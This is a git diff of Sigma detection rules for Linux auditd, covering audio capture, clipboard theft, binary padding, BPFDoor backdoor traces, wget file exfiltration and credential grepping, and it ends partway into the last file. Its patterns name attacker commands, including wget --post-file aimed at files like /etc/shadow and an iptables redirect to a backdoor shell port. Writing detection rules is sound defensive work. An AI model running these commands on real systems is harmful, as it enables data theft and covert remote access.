--git a/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml index 0692945f6..50f45bc6e 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml @@ -1,27 +1,26 @@ title: Audio Capture id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 +status: test description: Detects attempts to record audio with arecord utility - #the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay +references: + - https://linux.die.net/man/1/arecord + - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa author: 'Pawel Mazur' -status: experimental date: 2021/09/04 -references: - - https://linux.die.net/man/1/arecord - - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa - - https://attack.mitre.org/techniques/T1123/ +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1123 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: arecord - a1: '-vv' - a2: '-fdat' - condition: selection -tags: - - attack.collection - - attack.t1123 + selection: + type: EXECVE + a0: arecord + a1: '-vv' + a2: '-fdat' + condition: selection falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml index 71ce7553c..8b6e756b3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml @@ -2,30 +2,30 @@ title: Auditing Configuration Changes on Linux Host id: 977ef627-4539-4875-adf4-ed8f780c4922 status: test description: Detect changes in auditd configuration files -author: Mikhail Larin, oscd.community references: - - https://github.com/Neo23x0/auditd/blob/master/audit.rules - - self experience + - https://github.com/Neo23x0/auditd/blob/master/audit.rules + - Self Experience +author: Mikhail Larin, oscd.community date: 2019/10/25 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1562.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: PATH - name: - - /etc/audit/* - - /etc/libaudit.conf - - /etc/audisp/* - condition: selection + selection: + type: PATH + name: + - /etc/audit/* + - /etc/libaudit.conf + - /etc/audisp/* + condition: selection fields: - - exe - - comm - - key + - exe + - comm + - key falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: high -tags: - - attack.defense_evasion - - attack.t1562.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml index 9977fa858..968099af1 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml @@ -1,30 +1,34 @@ -title: 'Binary Padding' +title: Binary Padding - Linux id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba status: test -description: 'Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.' -author: 'Igor Fits, oscd.community' +description: | + Adversaries may use binary padding to add junk data and change the on-disk representation of malware. + This rule detect using dd and truncate to add a junk data to file. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md +author: Igor Fits, oscd.community date: 2020/10/13 -modified: 2021/11/27 +modified: 2023/05/03 +tags: + - attack.defense_evasion + - attack.t1027.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - truncate: - - 'truncate' - - '-s' - dd: - - 'dd' - - 'if=' - filter: - - 'of=' - condition: execve and (all of truncate or (all of dd and not filter)) + selection_execve: + type: 'EXECVE' + keywords_truncate: + '|all': + - 'truncate' + - '-s' + keywords_dd: + '|all': + - 'dd' + - 'if=' + keywords_filter: + - 'of=' + condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter)) falsepositives: - - Legitimate script work + - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1027.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml new file mode 100644 index 000000000..87da3bbb5 --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml @@ -0,0 +1,27 @@ +title: BPFDoor Abnormal Process ID or Lock File Accessed +id: 808146b2-9332-4d78-9416-d7e47012d83d +status: test +description: detects BPFDoor .lock and .pid files access in temporary file storage facility +references: + - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ + - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor +author: Rafal Piasecki +date: 2022/08/10 +tags: + - attack.execution + - attack.t1106 + - attack.t1059 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - /var/run/haldrund.pid + - /var/run/xinetd.lock + - /var/run/kdevrund.pid + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml new file mode 100644 index 000000000..4ea35cbb8 --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml @@ -0,0 +1,30 @@ +title: Bpfdoor TCP Ports Redirect +id: 70b4156e-50fc-4523-aa50-c9dddf1993fc +status: test +description: | + All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' + The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only. +references: + - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ + - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor +author: Rafal Piasecki +date: 2022/08/10 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: linux + service: auditd +detection: + cmd: + type: 'EXECVE' + a0|endswith: 'iptables' + a1: '-t' + a2: 'nat' + keywords: + - '--to-ports 42' + - '--to-ports 43' + condition: cmd and keywords +falsepositives: + - Legitimate ports redirect +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml index 2ee302365..0efda4f22 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml @@ -1,29 +1,30 @@ title: Linux Capabilities Discovery id: fe10751f-1995-40a5-aaa2-c97ccb4123fe -description: Detects attempts to discover the files with setuid/setgid capabilitiy on them. That would allow adversary to escalate their privileges. +status: test +description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. +references: + - https://man7.org/linux/man-pages/man8/getcap.8.html + - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ + - https://mn3m.info/posts/suid-vs-capabilities/ + - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 author: 'Pawel Mazur' -status: experimental date: 2021/11/28 -references: - - https://man7.org/linux/man-pages/man8/getcap.8.html - - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ - - https://mn3m.info/posts/suid-vs-capabilities/ - - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 +modified: 2022/12/25 +tags: + - attack.collection + - attack.privilege_escalation + - attack.t1123 + - attack.t1548 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: getcap - a1: '-r' - a2: '/' - condition: selection -tags: - - attack.collection - - attack.privilege_escalation - - attack.t1123 - - attack.t1548 + selection: + type: EXECVE + a0: getcap + a1: '-r' + a2: '/' + condition: selection falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml index 09d9a55b6..b86345eac 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -1,29 +1,29 @@ -title: 'File Time Attribute Change' +title: File Time Attribute Change - Linux id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b status: test -description: 'Detect file time attribute change to hide new or changes to existing files.' -author: 'Igor Fits, oscd.community' +description: Detect file time attribute change to hide new or changes to existing files. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.defense_evasion + - attack.t1070.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - touch: - - 'touch' - selection2: - - '-t' - - '-acmr' - - '-d' - - '-r' - condition: execve and touch and selection2 + execve: + type: 'EXECVE' + touch: + - 'touch' + selection2: + - '-t' + - '-acmr' + - '-d' + - '-r' + condition: execve and touch and selection2 falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.defense_evasion - - attack.t1070.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml index eaceefccb..50d720de3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml @@ -1,24 +1,24 @@ -title: Remove Immutable File Attribute +title: Remove Immutable File Attribute - Auditd id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 status: test description: Detects removing immutable file attribute. -author: Jakob Weinzettl, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 -modified: 2021/11/27 +modified: 2022/11/26 +tags: + - attack.defense_evasion + - attack.t1222.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: 'chattr' - a1|contains: '-i' - condition: selection + selection: + type: 'EXECVE' + a0|contains: 'chattr' + a1|contains: '-i' + condition: selection falsepositives: - - Administrator interacting with immutable files (e.g. for instance backups). + - Administrator interacting with immutable files (e.g. for instance backups). level: medium -tags: - - attack.defense_evasion - - attack.t1222.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml index b973b0bb2..d7f6633ff 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml @@ -1,16 +1,22 @@ -title: Clipboard Collection with Xclip Tool +title: Clipboard Collection with Xclip Tool - Auditd id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf -description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +status: test +description: | + Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. + Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://linux.die.net/man/1/xclip + - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ author: 'Pawel Mazur' -status: experimental date: 2021/09/24 -references: - - https://attack.mitre.org/techniques/T1115/ - - https://linux.die.net/man/1/xclip - - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ +modified: 2022/11/26 +tags: + - attack.collection + - attack.t1115 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: selection: type: EXECVE @@ -23,9 +29,6 @@ detection: - clip a3: '-o' condition: selection -tags: - - attack.collection - - attack.t1115 falsepositives: - - Legitimate usage of xclip tools + - Legitimate usage of xclip tools level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index fb68c7a65..0064fb443 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -1,32 +1,35 @@ title: Clipboard Collection of Image Data with Xclip Tool id: f200dc3f-b219-425d-a17e-c38467364816 -description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +status: test +description: | + Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. + Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://linux.die.net/man/1/xclip author: 'Pawel Mazur' -status: experimental date: 2021/10/01 -references: - - https://attack.mitre.org/techniques/T1115/ - - https://linux.die.net/man/1/xclip +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1115 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: xclip - a1: - - '-selection' - - '-sel' - a2: - - clipboard - - clip - a3: '-t' - a4|startswith: 'image/' - a5: '-o' - condition: selection -tags: - - attack.collection - - attack.t1115 + selection: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-t' + a4|startswith: 'image/' + a5: '-o' + condition: selection falsepositives: - - Legitimate usage of xclip tools + - Legitimate usage of xclip tools level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml index 5a7ec1d7a..fd45113d6 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml @@ -1,11 +1,12 @@ title: Possible Coin Miner CPU Priority Param id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed -status: experimental +status: test description: Detects command line parameter very often used with coin miners -author: Florian Roth -date: 2021/10/09 references: - https://xmrig.com/docs/miner/command-line-options +author: Florian Roth (Nextron Systems) +date: 2021/10/09 +modified: 2022/12/25 tags: - attack.privilege_escalation - attack.t1068 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml index 0cc93ec67..71a21f5b2 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml @@ -2,22 +2,26 @@ title: Creation Of An User Account id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 status: test description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. -author: Marie Euler references: - - 'MITRE Attack technique T1136; Create Account ' + - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files + - https://access.redhat.com/articles/4409591#audit-record-types-2 + - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 +author: Marie Euler, Pawel Mazur date: 2020/05/18 -modified: 2021/11/27 +modified: 2022/12/20 +tags: + - attack.t1136.001 + - attack.persistence logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - exe|endswith: '/useradd' - condition: selection + selection_syscall_record_type: + type: 'SYSCALL' + exe|endswith: '/useradd' + selection_add_user_record_type: + type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos + condition: 1 of selection_* falsepositives: - - Admin activity + - Admin activity level: medium -tags: - - attack.t1136.001 - - attack.persistence diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml deleted file mode 100644 index d8a6328fa..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ /dev/null @@ -1,42 +0,0 @@ -title: CVE-2021-3156 Exploitation Attempt -id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f -status: experimental -description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | - Alternative approach might be to look for flooding of auditd logs due to bruteforcing | - required to trigger the heap-based buffer overflow. -author: Bhabesh Raj -date: 2021/02/01 -modified: 2021/09/14 -references: - - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit -tags: - - attack.privilege_escalation - - attack.t1068 - - cve.2021.3156 -logsource: - product: linux - service: auditd -detection: - selection: - type: 'EXECVE' - a0: '/usr/bin/sudoedit' - cmd1: - a1: '-s' - cmd2: - a2: '-s' - cmd3: - a3: '-s' - cmd4: - a4: '-s' - cmd5: - a1: '\' - cmd6: - a2: '\' - cmd7: - a3: '\' - cmd8: - a4: '\' - condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) -falsepositives: - - Unknown -level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml deleted file mode 100644 index 64268f9b0..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: CVE-2021-3156 Exploitation Attempt -id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 -related: - - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f - type: derived -status: experimental -description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | - Alternative approach might be to look for flooding of auditd logs due to bruteforcing | - required to trigger the heap-based buffer overflow. -author: Bhabesh Raj -date: 2021/02/01 -modified: 2021/09/14 -references: - - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit -tags: - - attack.privilege_escalation - - attack.t1068 - - cve.2021.3156 -logsource: - product: linux - service: auditd -detection: - selection: - type: 'SYSCALL' - exe: '/usr/bin/sudoedit' - condition: selection -falsepositives: - - Unknown -level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml deleted file mode 100644 index df50b8d15..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml +++ /dev/null @@ -1,28 +0,0 @@ -title: CVE-2021-4034 Exploitation Attempt -id: 40a016ab-4f48-4eee-adde-bbf612695c53 -description: Detects exploitation attempt of vulnerability described in CVE-2021-4034. -author: 'Pawel Mazur' -status: experimental -date: 2022/01/27 -references: - - https://github.com/berdav/CVE-2021-4034 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034 - - https://access.redhat.com/security/cve/CVE-2021-4034 -logsource: - product: linux - service: auditd -detection: - proctitle: - type: PROCTITLE - proctitle: '(null)' - syscall: - type: SYSCALL - comm: pkexec - exe: '/usr/bin/pkexec' - condition: proctitle and syscall -tags: - - attack.privilege_escalation - - attack.t1068 -falsepositives: - - Unknown -level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml index adb8e6e0f..480b03092 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml @@ -2,30 +2,30 @@ title: Data Compressed id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee status: test description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -author: Timur Zinniatullin, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2023/07/28 +tags: + - attack.exfiltration + - attack.t1560.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection1: - type: 'execve' - a0: 'zip' - selection2: - type: 'execve' - a0: 'gzip' - a1: '-f' - selection3: - type: 'execve' - a0: 'tar' - a1|contains: '-c' - condition: 1 of selection* + selection1: + type: 'execve' + a0: 'zip' + selection2: + type: 'execve' + a0: 'gzip' + a1: '-k' + selection3: + type: 'execve' + a0: 'tar' + a1|contains: '-c' + condition: 1 of selection* falsepositives: - - Legitimate use of archiving tools by legitimate user. + - Legitimate use of archiving tools by legitimate user. level: low -tags: - - attack.exfiltration - - attack.t1560.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 77190c768..1beb9d63c 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -1,25 +1,27 @@ title: Data Exfiltration with Wget id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc -description: Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. +status: test +description: | + Detects attempts to post the file with the usage of wget utility. + The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. +references: + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ author: 'Pawel Mazur' -status: experimental date: 2021/11/18 -references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ +modified: 2022/12/25 +tags: + - attack.exfiltration + - attack.t1048.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection -tags: - - attack.exfiltration - - attack.t1048.003 + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection falsepositives: - - Legitimate usage of wget utility to post a file + - Legitimate usage of wget utility to post a file level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml index ef36926e6..3cb8f77c6 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml @@ -2,10 +2,13 @@ title: Overwriting the File with Dev Zero or Null id: 37222991-11e9-4b6d-8bdf-60fbe48f753e status: stable description: Detects overwriting (effectively wiping/deleting) of a file. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md author: Jakob Weinzettl, oscd.community date: 2019/10/23 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md +tags: + - attack.impact + - attack.t1485 logsource: product: linux service: auditd @@ -21,7 +24,3 @@ falsepositives: - Appending null bytes to files. - Legitimate overwrite of files. level: low - -tags: - - attack.impact - - attack.t1485 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml index 30428aa01..f25bf12f5 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml @@ -1,27 +1,26 @@ title: Disable System Firewall id: 53059bc0-1472-438b-956a-7508a94a91f0 -status: experimental +status: test description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. -author: 'Pawel Mazur' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md - - https://attack.mitre.org/techniques/T1562/004/ - - https://firewalld.org/documentation/man-pages/firewall-cmd.html + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md + - https://firewalld.org/documentation/man-pages/firewall-cmd.html +author: 'Pawel Mazur' date: 2022/01/22 +tags: + - attack.t1562.004 + - attack.defense_evasion logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SERVICE_STOP' - unit: - - 'firewalld' - - 'iptables' - - 'ufw' - condition: selection + selection: + type: 'SERVICE_STOP' + unit: + - 'firewalld' + - 'iptables' + - 'ufw' + condition: selection falsepositives: - - Admin activity + - Admin activity level: high -tags: - - attack.t1562.004 - - attack.defense_evasion diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml index 34b0f105a..9ba7d2e73 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml @@ -2,24 +2,24 @@ title: File or Folder Permissions Change id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 status: test description: Detects file and folder permission changes. -author: Jakob Weinzettl, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1222.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: - - 'chmod' - - 'chown' - condition: selection + selection: + type: 'EXECVE' + a0|contains: + - 'chmod' + - 'chown' + condition: selection falsepositives: - - User interacting with files permissions (normal/daily behaviour). + - User interacting with files permissions (normal/daily behaviour). level: low -tags: - - attack.defense_evasion - - attack.t1222.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml index e1877ffab..67ac87b8d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml @@ -1,25 +1,26 @@ -title: 'Credentials In Files' +title: Credentials In Files - Linux id: df3fcaea-2715-4214-99c5-0056ea59eb35 status: test description: 'Detecting attempts to extract passwords with grep' -author: 'Igor Fits, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2023/04/30 +tags: + - attack.credential_access + - attack.t1552.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - passwordgrep: - - 'grep' - - 'password' - condition: execve and all of passwordgrep + selection: + type: 'EXECVE' + keywords: + '|all': + - 'grep' + - 'password' + condition: selection and keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.credential_access - - attack.t1552.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml new file mode 100644 index 000000000..ea5f53b8d --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml @@ -0,0 +1,31 @@ +title: Use Of Hidden Paths Or Files +id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e +related: + - id: d08722cd-3d09-449a-80b4-83ea2d9d4616 + type: similar +status: test +description: Detects calls to hidden files or files located in hidden directories in NIX systems. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md +author: David Burkett, @signalblur +date: 2022/12/30 +tags: + - attack.defense_evasion + - attack.t1574.001 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name|contains: '/.' + filter: + name|contains: + - '/.cache/' + - '/.config/' + - '/.pyenv/' + - '/.rustup/toolchains' + condition: selection and not filter +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index 16f6fc03a..b7fa13520 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -1,33 +1,33 @@ title: Hidden Files and Directories id: 